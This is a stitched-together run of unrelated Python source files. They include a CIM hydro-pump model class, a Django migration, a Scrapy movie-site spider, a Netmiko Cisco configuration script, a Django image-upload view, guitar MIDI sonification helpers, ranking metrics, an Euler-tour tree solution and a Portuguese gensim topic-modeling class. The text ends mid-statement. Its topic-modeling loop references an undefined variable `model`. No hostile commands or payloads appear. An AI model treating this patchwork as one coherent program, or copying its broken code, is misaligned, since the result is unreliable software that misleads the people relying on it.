NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING # FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS # IN THE SOFTWARE. from CIM14.IEC61970.Core.PowerSystemResource import PowerSystemResource class HydroPump(PowerSystemResource): """A synchronous motor-driven pump, typically associated with a pumped storage plant """ def __init__(self, pumpPowerAtMaxHead=0.0, pumpPowerAtMinHead=0.0, pumpDischAtMinHead=0.0, pumpDischAtMaxHead=0.0, SynchronousMachine=None, HydroPumpOpSchedule=None, HydroPowerPlant=None, *args, **kw_args): """Initialises a new 'HydroPump' instance. 
@param pumpPowerAtMaxHead: The pumping power under maximum head conditions, usually at full gate @param pumpPowerAtMinHead: The pumping power under minimum head conditions, usually at full gate. @param pumpDischAtMinHead: The pumping discharge (m3/sec) under minimum head conditions, usually at full gate @param pumpDischAtMaxHead: The pumping discharge (m3/sec) under maximum head conditions, usually at full gate @param SynchronousMachine: The synchronous machine drives the turbine which moves the water from a low elevation to a higher elevation. The direction of machine rotation for pumping may or may not be the same as for generating. @param HydroPumpOpSchedule: The hydro pump has a pumping schedule over time, indicating when pumping is to occur. @param HydroPowerPlant: The hydro pump may be a member of a pumped storage plant or a pump for distributing water """ #: The pumping power under maximum head conditions, usually at full gate self.pumpPowerAtMaxHead = pumpPowerAtMaxHead #: The pumping power under minimum head conditions, usually at full gate. self.pumpPowerAtMinHead = pumpPowerAtMinHead #: The pumping discharge (m3/sec) under minimum head conditions, usually at full gate self.pumpDischAtMinHead = pumpDischAtMinHead #: The pumping discharge (m3/sec) under maximum head conditions, usually at full gate self.pumpDischAtMaxHead = pumpDischAtMaxHead self._SynchronousMachine = None self.SynchronousMachine = SynchronousMachine self._HydroPumpOpSchedule = None self.HydroPumpOpSchedule = HydroPumpOpSchedule self._HydroPowerPlant = None self.HydroPowerPlant = HydroPowerPlant super(HydroPump, self).__init__(*args, **kw_args) _attrs = ["pumpPowerAtMaxHead", "pumpPowerAtMinHead", "pumpDischAtMinHead", "pumpDischAtMaxHead"] _attr_types = {"pumpPowerAtMaxHead": float, "pumpPowerAtMinHead": float, "pumpDischAtMinHead": float, "pumpDischAtMaxHead": float} _defaults = {"pumpPowerAtMaxHead": 0.0, "pumpPowerAtMinHead": 0.0, "pumpDischAtMinHead": 0.0, "pumpDischAtMaxHead": 0.0} _enums = {} _refs = ["SynchronousMachine", "HydroPumpOpSchedule", "HydroPowerPlant"] _many_refs = [] def getSynchronousMachine(self): """The synchronous machine drives the turbine which moves the water from a low elevation to a higher elevation. The direction of machine rotation for pumping may or may not be the same as for generating. """ return self._SynchronousMachine def setSynchronousMachine(self, value): if self._SynchronousMachine is not None: self._SynchronousMachine._HydroPump = None self._SynchronousMachine = value if self._SynchronousMachine is not None: self._SynchronousMachine.HydroPump = None self._SynchronousMachine._HydroPump = self SynchronousMachine = property(getSynchronousMachine, setSynchronousMachine) def getHydroPumpOpSchedule(self): """The hydro pump has a pumping schedule over time, indicating when pumping is to occur. 
""" return self._HydroPumpOpSchedule def setHydroPumpOpSchedule(self, value): if self._HydroPumpOpSchedule is not None: self._HydroPumpOpSchedule._HydroPump = None self._HydroPumpOpSchedule = value if self._HydroPumpOpSchedule is not None: self._HydroPumpOpSchedule.HydroPump = None self._HydroPumpOpSchedule._HydroPump = self HydroPumpOpSchedule = property(getHydroPumpOpSchedule, setHydroPumpOpSchedule) def getHydroPowerPlant(self): """The hydro pump may be a member of a pumped storage plant or a pump for distributing water """ return self._HydroPowerPlant def setHydroPowerPlant(self, value): if self._HydroPowerPlant is not None: filtered = [x for x in self.HydroPowerPlant.HydroPumps if x != self] self._HydroPowerPlant._HydroPumps = filtered self._HydroPowerPlant = value if self._HydroPowerPlant is not None: if self not in self._HydroPowerPlant._HydroPumps: self._HydroPowerPlant._HydroPumps.append(self) HydroPowerPlant = property(getHydroPowerPlant, setHydroPowerPlant) # Generated by Django 3.0.3 on 2021-02-25 07:34 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('workspaces', '0009_workspacegeneralsettings_import_categories'), ] operations = [ migrations.AddField( model_name='workspacegeneralsettings', name='auto_create_destination_entity', field=models.BooleanField(default=False, help_text='Auto create vendor / employee'), ), ] #!/usr/bin/env python # -*- coding: utf-8 -*- # Created by HazzaCheng on 2019-09-22 import time from typing import Any import logging import sys nesting_level = 0 def log_old(entry: Any): global nesting_level space = "-" * (4 * nesting_level) print("{}{}".format(space, entry)) def get_logger(verbosity_level): """Set logging format to something like: 2019-04-25 12:52:51,924 INFO model.py: <message> """ logger = logging.getLogger(__file__) logging_level = getattr(logging, verbosity_level) logger.setLevel(logging_level) # formatter = logging.Formatter( # fmt='%(asctime)s %(levelname)s %(filename)s: %(message)s') formatter = logging.Formatter('%(asctime)s | %(filename)s:%(lineno)d | %(levelname)s | %(message)s') stdout_handler = logging.StreamHandler(sys.stdout) stdout_handler.setLevel(logging_level) stdout_handler.setFormatter(formatter) stderr_handler = logging.StreamHandler(sys.stderr) stderr_handler.setLevel(logging.WARNING) stderr_handler.setFormatter(formatter) logger.addHandler(stdout_handler) logger.addHandler(stderr_handler) logger.propagate = False return logger logger = get_logger('INFO') log = logger.info log_warning = logger.warning info = logger.info def timeit(method, start_log=None): def wrapper(*args, **kw): global nesting_level log("Start [{}]:" + (start_log if start_log else "").format(method.__name__)) nesting_level += 1 start_time = time.time() result = method(*args, **kw) end_time = time.time() nesting_level -= 1 log("End [{}]. 
Time elapsed: {:0.2f} sec.".format(method.__name__, end_time - start_time))
        return result

    return wrapper
<reponame>yuheng-json/Scrapy-ProjectAll
# -*- coding: utf-8 -*-
import scrapy

from movie.items import MovieItem

'''
Requirement: crawl the "Movie Heaven" (ygdy8.net) site, scraping data from
both the first-level (list) page and the second-level (detail) page, and
store it in a single item object.

First-level page:
    title  //div[@class="co_content8"]//table//a/text()
    href   //div[@class="co_content8"]//table//a/@href
    e.g. http://www.ygdy8.net/html/gndy/dyzz/20181025/57658.html

Second-level page:
    src    //div[@id="Zoom"]/span/p[1]/img[1]/@src
'''


class MvSpider(scrapy.Spider):
    name = 'mv'
    allowed_domains = ['www.ygdy8.net']
    start_urls = ['http://www.ygdy8.net/html/gndy/dyzz/index.html']

    # The return value of this method is an iterable object.
    def parse(self, response):
        a_list = response.xpath('//div[@class="co_content8"]//table//a')
        for a in a_list:
            # Note the data attribute of the selector objects.
            title = a.xpath('./text()').extract_first()
            href = a.xpath('./@href').extract_first()
            url = 'http://www.ygdy8.net' + href
            movie = MovieItem(title=title)
            # yield Request(...): url is the request to send, callback the
            # method to run, and meta the data carried along with the response.
            yield scrapy.Request(url=url, callback=self.parse_detail, meta={'movie': movie})

    # response is the response produced by the url of the Request above.
    def parse_detail(self, response):
        movie = response.meta['movie']
        src = response.xpath('//div[@id="Zoom"]//p[1]/img[1]/@src').extract_first()
        movie['src'] = src
        yield movie
# if you use the default maze client
import mazeClient


def main():
    pass


if __name__ == "__main__":
    main()
from Xlib import XK

# Convert strings to keysyms
str_to_keysym = {
    'left': XK.XK_Left,
    'right': XK.XK_Right,
    'up': XK.XK_Up,
    'down': XK.XK_Down,
    't': XK.XK_T,
    'e': XK.XK_E,
    'x': XK.XK_X,
    'escape': XK.XK_Escape,
}
"""interpreter """
import librosa
import numpy as np
import pretty_midi
from matplotlib import lines as mlines, pyplot as plt


def jams_to_midi(jam, q=1):
    # q = 1: with pitch bend. q = 0: without pitch bend.
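    # Added note (not in the original source): each JAMS note value is a
    # fractional MIDI number; the code below rounds it to the nearest integer
    # pitch and encodes the remaining fraction as a pitch bend. The factor
    # 4096 assumes the synthesizer's default bend range of +/-2 semitones over
    # the +/-8192 pitch-bend scale, i.e. 1 semitone == 4096 bend units.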
midi = pretty_midi.PrettyMIDI() annos = jam.search(namespace='pitch_midi') for anno in annos: midi_ch = pretty_midi.Instrument(program=25) for note in anno: pitch = int(round(note.value)) bend_amount = int(round((note.value - pitch) * 4096)) st = note.time dur = note.duration n = pretty_midi.Note( velocity=100 + np.random.choice(range(-5, 5)), pitch=pitch, start=st, end=st + dur ) pb = pretty_midi.PitchBend(pitch=bend_amount*q, time=st) midi_ch.notes.append(n) midi_ch.pitch_bends.append(pb) if len(midi_ch.notes) != 0: midi.instruments.append(midi_ch) return midi def sonify_jams(jam, fpath='resources/sonify_out/test.wav', q=1): midi = jams_to_midi(jam, q) # q=1 : with pitchbend signal_out = midi.fluidsynth() librosa.output.write_wav(fpath, signal_out, 44100) return fpath def visualize_jams(jam): style_dict = {0 : 'r', 1 : 'y', 2 : 'b', 3 : '#FF7F50', 4 : 'g', 5 : '#800080'} string_dict = {0: 'E', 1: 'A', 2: 'D', 3: 'G', 4: 'B', 5: 'e' } s = 0 handle_list = [] for string_tran in jam.search(namespace='pitch_midi'): handle_list.append(mlines.Line2D([], [], color=style_dict[s], label=string_dict[s])) for note in string_tran: start_time = note[0] midi_note = note[2] dur = note[1] plt.plot([start_time, start_time + dur], [midi_note, midi_note], style_dict[s], label=string_dict[s]) s += 1 plt.xlabel('Time (sec)') plt.ylabel('Pitch (midi note number)') plt.legend(loc='center left', bbox_to_anchor=(1, 0.5), handles=handle_list) plt.show() def tablaturize_jams(jam): str_midi_dict = {0: 40, 1: 45, 2: 50, 3: 55, 4: 59, 5: 64} style_dict = {0 : 'r', 1 : 'y', 2 : 'b', 3 : '#FF7F50', 4 : 'g', 5 : '#800080'} s = 0 for string_tran in jam.search(namespace='pitch_midi'): for note in string_tran: start_time = note[0] midi_note = note[2] fret = int(round(midi_note - str_midi_dict[s])) plt.scatter(start_time, s, marker="${}$".format(fret), color = style_dict[s]) s += 1 plt.xlabel('Time (sec)') plt.ylabel('String Number') plt.title(jam.file_metadata.title) plt.show() from gpt2.training import Recorder def test_recorder_record(): recorder = Recorder() recorder.record({'metric1': 0, 'metric2': 1}) recorder.record({'metric1': 1, 'metric2': 5}) recorder.record({'metric1': 2, 'metric2': 9}) # The below values would be recorded in different scope. recorder.record({'metric1': 0, 'metric2': 1}, scope='scope') recorder.record({'metric1': 1, 'metric2': 3}, scope='scope') recorder.record({'metric1': 2, 'metric2': 5}, scope='scope') recorder.record({'metric1': 3, 'metric2': 7}, scope='scope') assert recorder.batch_metrics == { 'metric1': [0, 1, 2], 'metric2': [1, 5, 9], 'scope/metric1': [0, 1, 2, 3], 'scope/metric2': [1, 3, 5, 7]} def test_recorder_stamp(): recorder = Recorder() recorder.record({'metric1': 0, 'metric2': 1}) recorder.record({'metric1': 1, 'metric2': 5}) recorder.record({'metric1': 2, 'metric2': 9}) # The below values would be recorded in different scope. 
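    # Added note (not in the original source): judging by the assertions in
    # these tests, stamp() averages everything recorded since the previous
    # stamp into (step, mean) pairs, clears the per-batch buffers, and keys
    # scoped metrics as 'scope/metricN'.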
recorder.record({'metric1': 0, 'metric2': 1}, scope='scope') recorder.record({'metric1': 1, 'metric2': 3}, scope='scope') recorder.record({'metric1': 2, 'metric2': 5}, scope='scope') recorder.record({'metric1': 3, 'metric2': 7}, scope='scope') recorder.stamp(step=1) assert recorder.metrics == { 'metric1': [(1, 1)], 'metric2': [(1, 5)], 'scope/metric1': [(1, 1.5)], 'scope/metric2': [(1, 4)]} def test_recorder_format(): recorder = Recorder() recorder.record({'metric1': 0, 'metric2': 1}, scope='scope') recorder.record({'metric1': 1, 'metric2': 3}, scope='scope') recorder.record({'metric1': 2, 'metric2': 5}, scope='scope') recorder.record({'metric1': 3, 'metric2': 7}, scope='scope') recorder.stamp(step=1) assert (recorder.format('{scope_metric1:.1f}:{scope_metric2:.1f}') == '1.5:4.0') # The recorder formats the string with last-stamped metrics, so the # formatted string will be modified. recorder.record({'metric1': 7, 'metric2': 5}, scope='scope') recorder.record({'metric1': 8, 'metric2': 7}, scope='scope') recorder.record({'metric1': 9, 'metric2': 9}, scope='scope') recorder.record({'metric1': 10, 'metric2': 11}, scope='scope') recorder.stamp(step=1) assert (recorder.format('{scope_metric1:.1f}:{scope_metric2:.1f}') == '8.5:8.0') from functools import singledispatch from netmiko import ConnectHandler import yaml from pprint import pprint from collections.abc import Iterable @singledispatch def send_commands(command, device): print("singledispatch") raise NotImplementedError("Поддерживается только строка или iterable") # send_commands = singledispatch(send_commands) @send_commands.register def _(show_command: str, device): print("Аргумент строка") with ConnectHandler(**device) as ssh: ssh.enable() result = ssh.send_command(show_command) return result @send_commands.register def _(config_commands: Iterable, device): print("Аргумент iterable") with ConnectHandler(**device) as ssh: ssh.enable() result = ssh.send_config_set(config_commands) return result if __name__ == "__main__": commands = ["logging 10.255.255.1", "logging buffered 20010", "no logging console"] show_command = "sh ip int br" r1 = { "device_type": "cisco_ios", "username": "cisco", "password": "<PASSWORD>", "secret": "cisco", "ip": "192.168.100.1", } send_commands(tuple(commands), r1) send_commands(show_command, r1) <reponame>istommao/django-simditor """simditor views.""" from __future__ import absolute_import import os from datetime import datetime from django.conf import settings from django.core.files.storage import default_storage from django.http import JsonResponse from django.views import generic from django.views.decorators.csrf import csrf_exempt from . import utils, image_processing def get_upload_filename(upload_name): # Generate date based path to put uploaded file. date_path = datetime.now().strftime('%Y/%m/%d') # Complete upload path (upload_path + date_path). 
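    # Added note (not in the original source): uploads are grouped under a
    # Y/m/d sub-directory; the filename may be slugified depending on the
    # SIMDITOR_UPLOAD_SLUGIFY_FILENAME setting, and default_storage's
    # get_available_name() is then used so an existing file is never
    # overwritten (Django appends a suffix when the name is already taken).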
upload_path = os.path.join(settings.SIMDITOR_UPLOAD_PATH, date_path) if getattr(settings, 'SIMDITOR_UPLOAD_SLUGIFY_FILENAME', True): upload_name = utils.slugify_filename(upload_name) return default_storage.get_available_name(os.path.join(upload_path, upload_name)) def upload_handler(request): files = request.FILES upload_config = settings.SIMDITOR_CONFIGS.get( 'upload', {'fileKey': 'upload'}) filekey = upload_config.get('fileKey', 'upload') uploaded_file = files.get(filekey) if not uploaded_file: retdata = {'file_path': '', 'success': False, 'msg': '图片上传失败,无法获取到图片对象!'} return JsonResponse(retdata) image_size = upload_config.get('image_size') if image_size and uploaded_file.size > image_size: retdata = {'file_path': '', 'success': False, 'msg': '上传失败,已超出图片最大限制!'} return JsonResponse(retdata) backend = image_processing.get_backend() if not getattr(settings, 'SIMDITOR_ALLOW_NONIMAGE_FILES', True): try: backend.image_verify(uploaded_file) except utils.NotAnImageException: retdata = {'file_path': '', 'success': False, 'msg': '图片格式错误!'} return JsonResponse(retdata) filename = get_upload_filename(uploaded_file.name) saved_path = default_storage.save(filename, uploaded_file) url = utils.get_media_url(saved_path) is_api = settings.SIMDITOR_CONFIGS.get('is_api', False) url = request.META.get('HTTP_ORIGIN') + url if is_api else url retdata = {'file_path': url, 'success': True, 'msg': '上传成功!'} return JsonResponse(retdata) class ImageUploadView(generic.View): """ImageUploadView.""" http_method_names = ['post'] def post(self, request, **kwargs): """Post.""" return upload_handler(request) UPLOAD = csrf_exempt(ImageUploadView.as_view()) <reponame>wnjnz/tweetbot from twython import TwythonStreamer from auth import ( consumer_key, consumer_secret, access_token, access_token_secret ) class MyStreamer(TwythonStreamer): def on_success(self, data): if 'text' in data: username = data['user']['screen_name'] tweet = data['text'] print("@{}: {}".format(username, tweet)) stream = MyStreamer( consumer_key, consumer_secret, access_token, access_token_secret ) stream.statuses.filter(track='#innovation') """ ** deeplean-ai.com ** ** dl-lab ** created by :: GauravBh1010tt """ from __future__ import division from operator import itemgetter from collections import defaultdict import scipy.stats as measures import numpy as np ###################### CALCULATING MRR [RETURNS MRR VALUE] ###################### def mrr(out, th = 10): n = len(out) MRR = 0.0 for qid in out: candidates = out[qid] for i in xrange(min(th, len(candidates))): if candidates[i] == "true": MRR += 1.0 / (i + 1) break return MRR * 100.0 / n ###################### CALCULATING MAP [RETURNS MAP VALUE] ###################### def map(out, th): num_queries = len(out) MAP = 0.0 for qid in out: candidates = out[qid] avg_prec = 0 precisions = [] num_correct = 0 for i in xrange(min(th, len(candidates))): if candidates[i] == "true": num_correct += 1 precisions.append(num_correct/(i+1)) if precisions: avg_prec = sum(precisions)/len(precisions) MAP += avg_prec return MAP / num_queries ###################### QUESTION LIST TO DICTIONARY [RETURNS DICTIONARY OF LISTS] ###################### def list2dict(lst): interm = defaultdict(list) new_pred = defaultdict(list) for i in range(len(lst)): interm[i+1] = lst[i] for qid in interm: interm[qid] = sorted(interm[qid], key = itemgetter(0), reverse = True) val = [rel for score, rel in interm[qid]] if 'true' in val: new_pred[qid] = val else: continue return new_pred ###################### READING FILE [RETURNS LIST OF LISTS] 
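# --- Added worked example (not part of the original source) ----------------
# For the mrr()/map() helpers above, `out` maps a query id to its ranked
# candidate labels ("true"/"false"). With two queries
#     out = {1: ["false", "true", "false"], 2: ["true", "false"]}
# the first relevant answer sits at rank 2 and rank 1 respectively, so
#     mrr(out)       = (1/2 + 1/1) / 2 * 100 = 75.0
# and, since each query here has a single "true" candidate,
#     map(out, th=10) = (1/2 + 1/1) / 2 = 0.75
# Note these helpers are Python 2 code (they rely on xrange).
# ---------------------------------------------------------------------------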
###################### def readfile(pred_fname): pred = open(pred_fname).readlines() pred = [line.split('\t') for line in pred] ques = [] ans = [] i = 1 while i != len(pred): if pred[i][0] == pred[i-1][0]: ans.append([float(pred[i-1][-2]), pred[i-1][-1][0:-1]]) else: ans.append([float(pred[i-1][-2]), pred[i-1][-1][0:-1]]) ques.append(ans) ans = [] i += 1 ans.append([float(pred[i-1][-2]), pred[i-1][-1][0:-1]]) ques.append(ans) return ques ###################### MAP AND MRR FUNCTION [RETURNS MAP AND MRR VALUES] ###################### def map_mrr(pred_fname, th = 10): ques = readfile(pred_fname) dic = list2dict(ques) return map(dic,th), mrr(dic,th) def eval_metric(lrmodel, X_test_l, X_test_r, res_fname,pred_fname,use_softmax=True, feat_test=None): if feat_test!=None: pred = lrmodel.predict([X_test_l, X_test_r, feat_test])[:,1] else: pred = lrmodel.predict([X_test_l, X_test_r])[:,1] ################### SAVING PREDICTIONS ################### f1 = open(res_fname, 'r').readlines() f2 = open(pred_fname,'w') for j,line in enumerate(f1): line = line.split('\t') #val = [line[0]+'\t',line[1]+'\t',line[2]+'\t',str(pred[j][0])+'\t',line[-1]] if use_softmax: val = [line[0]+'\t',line[1]+'\t',line[2]+'\t',str(pred[j])+'\t',line[-1]] else: val = [line[0]+'\t',line[1]+'\t',line[2]+'\t',str(pred[j][0])+'\t',line[-1]] f2.writelines(val) f2.close() ################### PRINTING AND SAVING MAP-MRR VALUES ################### map_val, mrr_val = map_mrr(pred_fname) #print 'MAP:', map_val #print 'MRR:', mrr_val return map_val, mrr_val def eval_sick(model,X_test_l,X_test_r,test_score): #r = np.arange(1,6) pred = model.predict([X_test_l,X_test_r])*4+1 pred = [i[0] for i in pred] pred = np.array(pred) test_score = np.array(test_score)*4+1 sp_coef = measures.spearmanr(pred,test_score)[0] per_coef = measures.pearsonr(pred,test_score)[0] mse_coef = np.mean(np.square(pred-test_score)) return sp_coef, per_coef, mse_coef<reponame>NULLCT/LOMC<filename>src/data/904.py # author: Taichicchi # created: 10.07.2021 21:13:51 import sys sys.setrecursionlimit(10**6) N, Q = map(int, input().split()) G = [[] for _ in range(N)] for i in range(N - 1): a, b = map(lambda x: int(x) - 1, input().split()) G[a].append(b) G[b].append(a) def EulerTour(to, root=0): n = len(to) depth = [-1] * n depth[root] = 0 first_visit_index = [-1] * n res = [] stack = [(root, 0)] while stack: u, i = stack.pop() if i == 0: first_visit_index[u] = len(res) res.append(u) if i < len(to[u]): v = to[u][i] stack.append((u, i + 1)) if depth[v] == -1: depth[v] = depth[u] + 1 stack.append((v, 0)) else: res.pop() return res, first_visit_index, depth class SparseTableMin: def __init__(self, aa): w = len(aa) h = w.bit_length() table = [aa] + [[-1] * w for _ in range(h - 1)] tablei1 = table[0] for i in range(1, h): tablei = table[i] for j in range(w - (1 << i) + 1): rj = j + (1 << (i - 1)) tablei[j] = min(tablei1[j], tablei1[rj]) tablei1 = tablei self.table = table # [l,r)の最小値 def min(self, l, r): i = (r - l).bit_length() - 1 tablei = self.table[i] Lmin = tablei[l] Rmin = tablei[r - (1 << i)] if Lmin < Rmin: Rmin = Lmin return Rmin # intにしてから1引く関数。頂点の入力に使う def int1(x): return int(x) - 1 # et...オイラーツアーの頂点順 # fi...頂点がオイラーツアーで最初に現れるindex # dep...頂点の深さ et, fi, dep = EulerTour(G) # オイラーツアーに対応させた深さのリストをスパーステーブルに渡す sp = SparseTableMin([dep[u] for u in et]) for _ in range(Q): c, d = map(lambda x: int(x) - 1, input().split()) q = sp.min(c, d) dist = 1 + dep[c] + dep[d] - 2 * dep[q] print("Town" if dist % 2 == 1 else "Road") # -*- coding: utf-8 -*- """ Created on Wed Mar 25 11:24:51 
2020 @author: <NAME> @project: Classe que trata o topic modeling """ from spacy.tokens import Doc import numpy from spacy.attrs import LOWER, POS, ENT_TYPE, IS_ALPHA from neo4j import GraphDatabase import pandas as pd import os #import subprocess #import requests #import unidecode import re import csv from acessos import get_conn, read, persistir_banco, persistir_multiplas_linhas import sys import re, numpy as np, pandas as pd from pprint import pprint import spacy # Gensim import gensim from gensim import corpora, models, similarities import gensim, spacy, logging, warnings import gensim.corpora as corpora from gensim.utils import lemmatize, simple_preprocess from gensim.models import CoherenceModel import matplotlib.pyplot as plt from gensim import corpora, models, similarities # NLTK Stop words from nltk.corpus import stopwords from acessos import read, get_conn, persistir_uma_linha, persistir_multiplas_linhas, replace_df from gensim.models.ldamulticore import LdaMulticore import seaborn as sns import matplotlib.colors as mcolors #%matplotlib inline warnings.filterwarnings("ignore",category=DeprecationWarning) logging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s', level=logging.ERROR) import os import warnings warnings.filterwarnings("ignore",category=DeprecationWarning) from gensim.test.utils import datapath class Topic_Modeling: def __init__(self, language="pt-br", stop_words_list=[]): self.language = language self.stop_words = self._load_stop_words(stop_words_list) self.nlp = self._load_spacy() self.model_list =[] self.coherence_values = [] self.lista_num_topics = [] self.melhor_modelo = None def _load_spacy(self): '''metodo privado que retorna o modelo do spacy baseado no idioma''' #disable_list = ['parser', 'ner'] disable_list = [] if self.language == "pt-br": nlp = spacy.load('pt_core_news_lg', disable=disable_list) elif self.language == "us-en": nlp = spacy.load("en_core_web_sm", disable=disable_list) return nlp def _load_stop_words(self, stop_words_list=[]): '''metodo privado que retorna as stop words baseado no idioma''' if self.language == "pt-br": stop_words = stopwords.words('portuguese') stop_words.extend(stop_words_list) elif self.language == "us-en": stop_words = stopwords.words('english') #Testar stop_words.extend(['from', 'subject', 're', 'edu', 'use', 'not', 'would', 'say', 'could', '_', 'be', 'know', 'good', 'go', 'get', 'do', 'done', 'try', 'many', 'some', 'nice', 'thank', 'think', 'see', 'rather', 'easy', 'easily', 'lot', 'lack', 'make', 'want', 'seem', 'run', 'need', 'even', 'right', 'line', 'even', 'also', 'may', 'take', 'come']) stop_words.extend(stop_words_list) return stop_words def filtrar_pos_tag(self, texto, allowed_postags=["NOUN", "PROPN", "VERB", "ADJ"]): texto_saida = "" doc = self.nlp(texto) for token in doc: if token.pos_ in allowed_postags: texto_saida += " {}".format(token) return texto_saida def replace_ner_por_label(self, texto): texto_out = texto doc = self.nlp(texto) for ent in reversed(doc.ents): #label = " _" + ent.label_ + "_ " label = ent.label_ comeco = ent.start_char fim = comeco + len(ent.text) texto_out = texto_out [:comeco] + label + texto_out[fim:] return texto_out def processamento_inicial(self, lista_documentos): '''remove emails, quebra de linhas e single quotes''' #Tratando abreviações lista_documentos = [re.sub('neh', 'né', sent) for sent in lista_documentos] lista_documentos = [re.sub('td', 'tudo', sent) for sent in lista_documentos] lista_documentos = [re.sub('tds', 'todos', sent) for sent in lista_documentos] 
lista_documentos = [re.sub('vc', 'você', sent) for sent in lista_documentos] lista_documentos = [re.sub('vcs', 'vocês', sent) for sent in lista_documentos] lista_documentos = [re.sub('voce', 'você', sent) for sent in lista_documentos] lista_documentos = [re.sub('tbm', 'também', sent) for sent in lista_documentos] # Remove Emails lista_documentos = [re.sub('\S*@\S*\s?', '', sent) for sent in lista_documentos] # Remove new line characters lista_documentos = [re.sub('\s+', ' ', sent) for sent in lista_documentos] # Remove distracting single quotes lista_documentos = [re.sub("\'", "", sent) for sent in lista_documentos] return lista_documentos def sent_to_words(self, sentences): '''tokeniza um unico documento''' for sentence in sentences: yield(gensim.utils.simple_preprocess(str(sentence), deacc=False)) # deacc=True removes punctuations def tokenizar(self, lista_documentos): '''tokeniza uma lista de documentos''' lista_documentos_tokenizado = list(self.sent_to_words(lista_documentos)) return lista_documentos_tokenizado def montar_n_grams(self, lista_documentos_tokenizado): '''monta bi_grams e tri_grams de uma lista de documentos tokenizado utilizar este metodo depois de remover stop words''' bigram = gensim.models.Phrases(lista_documentos_tokenizado, min_count=5, threshold=100) # higher threshold fewer phrases. trigram = gensim.models.Phrases(bigram[lista_documentos_tokenizado], threshold=100) # Faster way to get a sentence clubbed as a trigram/bigram bigram_mod = gensim.models.phrases.Phraser(bigram) trigram_mod = gensim.models.phrases.Phraser(trigram) #retorna lista bigram e trigram self.bigram = [bigram_mod[doc] for doc in lista_documentos_tokenizado] self.trigram = [trigram_mod[bigram_mod[doc]] for doc in lista_documentos_tokenizado] return self.bigram , self.trigram def get_n_grams(self): return self.bigram , self.trigram def lematizar_documentos(self, lista_documentos_tokenizado): """https://spacy.io/api/annotation""" documentos_out = [] for sent in lista_documentos_tokenizado: doc = self.nlp(" ".join(sent)) lista_tokens_lematizados = [] for token in doc : lista_tokens_lematizados.append(token.lemma_) documentos_out.append(lista_tokens_lematizados) return documentos_out def remover_stop_words(self, lista_documentos_tokenizado): return [[word for word in simple_preprocess(str(doc)) if word not in self.stop_words] for doc in lista_documentos_tokenizado] def montar_novo_corpus(self, nova_lista_documentos_lematizada, id2word): print(id2word) corpus = [id2word.doc2bow(text) for text in nova_lista_documentos_lematizada] return corpus def pre_processar_texto_ou_lista(self, texto_ou_lista, filtro_ner=True, allowed_postags=["NOUN","PROPN", "VERB", "ADJ"]): if isinstance(texto_ou_lista, str): lista_documentos = [texto_ou_lista] else: lista_documentos = texto_ou_lista lista_documentos = self.processamento_inicial(lista_documentos) if filtro_ner==True: lista_documentos = [self.replace_ner_por_label(texto) for texto in lista_documentos] # if filtro_pos_tag==True: # lista_documentos = [self.filtrar_pos_tag(texto) for texto in lista_documentos] lista_documentos = [self.filtrar_pos_tag(texto, allowed_postags) for texto in lista_documentos] lista_documentos_tokenizado = self.tokenizar(lista_documentos) lista_documentos_tokenizado_stop_words = self.remover_stop_words(lista_documentos_tokenizado) lista_documento_bi_gram, lista_documento_tri_gram = self.montar_n_grams(lista_documentos_tokenizado_stop_words) lista_documento_lematizada = self.lematizar_documentos(lista_documento_tri_gram) 
#lista_documento_lematizada = lista_documento_bi_gram return lista_documento_lematizada def gerar_modelo_hdp(self, corpus, id2word, texts): model_hdp = models.HdpModel(corpus, id2word=id2word) coherencemodel = CoherenceModel(model=model_hdp, texts=texts, dictionary=id2word, coherence='c_v') self.melhor_modelo = model_hdp return model_hdp, coherencemodel.get_coherence() def gerar_multiplos_modelos(self, id2word, corpus, texts, limit, start=2, step=3): print("Start: {}".format(start)) print("limit: {}".format(limit)) print("Step: {}".format(step)) self.start = start self.limit = limit self.step = step coherence_values = [] model_list = [] for num_topics in range(start, limit, step): print("Gerando novo modelo...") # model = gensim.models.ldamodel.LdaModel(corpus=corpus, # id2word=id2word, # num_topics=num_topics, # random_state=100, # update_every=1, # chunksize=100, # passes=10, # alpha='auto', # per_word_topics=True) lda = LdaMulticore(corpus=corpus, id2word=id2word, random_state=100, num_topics=num_topics, workers=3) model_list.append(model) coherencemodel = CoherenceModel(model=model, texts=texts, dictionary=id2word, coherence='c_v') coherence_values.append(coherencemodel.get_coherence()) self.lista_num_topics.append(num_topics) self.model_list = model_list self.coherence_values = coherence_values return model_list, coherence_values def plotar_coerencia(self): x = range(self.start, self.limit, self.step) plt.plot(x, self.coherence_values) plt.xlabel("Num de Tópicos") plt.ylabel("Coherence score") plt.legend(("coherence_values"), loc='best') plt.show() for m, cv in zip(x, self.coherence_values): print("Num de Tópicos =", m, " valor coerência: ", round(cv, 4)) def classificar_novo_texto(self, texto, model,id2word): lista_lematizada = self.pre_processar_texto_ou_lista(texto) novo_corpus = self.montar_novo_corpus(lista_lematizada,id2word) doc_bow = novo_corpus[0] topicos = model[doc_bow] #topicos_ordenados = sorted(topicos[0], key=lambda x: x[1], reverse=True) topicos_ordenados = sorted(topicos, key=lambda x: x[1], reverse=True) melhor_topico = topicos_ordenados[0] #print(topicos_ordenados) return melhor_topico, topicos_ordenados def montar_id2word(self, lista_documento_lematizada): id2word = corpora.Dictionary(lista_documento_lematizada) return id2word def montar_dict_models(self): dict_models = { "modelo": self.model_list, "coerencia":self.coherence_values, "num_topics": self.lista_num_topics } return dict_models def salvar_modelos(self, diretorio, folder_name): dict_models = self.montar_dict_models() df_models = pd.DataFrame(dict_models) folder_name = "{}\\{}".format(diretorio,folder_name) try: os.mkdir(folder_name) except OSError: print ("Erro na criação da pasta") return "erro" df_models['caminho'] = df_models.apply(lambda x: "{}\\#_{}".format(folder_name, str(x['num_topics'])), axis=1) for row in df_models.iterrows(): row[1]['modelo'].save(row[1]['caminho']) df_models.drop(['modelo'], axis=1, inplace=True) dict_models = df_models.to_dict("records") return dict_models def retornar_melhor_modelo(self): dict_models = self.montar_dict_models() df_models = pd.DataFrame(dict_models) self.melhor_modelo = df_models.sort_values(by=['coerencia'], 